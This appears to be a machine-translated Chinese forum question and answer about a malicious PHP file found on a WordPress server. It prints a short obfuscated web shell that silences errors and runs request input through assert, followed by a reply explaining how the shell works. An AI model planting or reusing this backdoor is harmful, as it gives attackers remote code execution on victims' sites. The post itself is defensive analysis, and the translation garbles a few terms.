我在服务器上发现了恶意的PHP脚本



我刚刚在我的服务器上一个名为wp-styles的文件中发现了这个恶意PHP代码.php - 请帮我解码它。

@error_reporting(0); 
@ini_set("display_errors",0);    
@ini_set("log_errors",0); 
@ini_set("error_log",0); 
$my_str = "ammerw"; 
$my_str = str_replace("m", "s", $my_str); $my_str = str_replace("w", "t", $my_str); 
array_map($my_str, $_REQUEST["0107e00d68f62ad87fbe5399c1300762"]);
我认为

你必须更深入地挖掘。如您所见,它会关闭任何错误报告。字符串"ammert"将转换为"断言"。然后array_map将此字符串用作回调函数,并将存储在 $_REQUEST["0107e00d68f62ad87fbe5399c1300762"] 中的值作为参数传递。如果此值是字符串,断言将运行此代码!因此,您必须使用上面的键检查 $_REQUEST 中存储的值。这可能非常危险,具体取决于超全局变量 $_REQUEST 中的代码。并请检查,何时调用此 obcsure 脚本。

希望这有帮助。

最新更新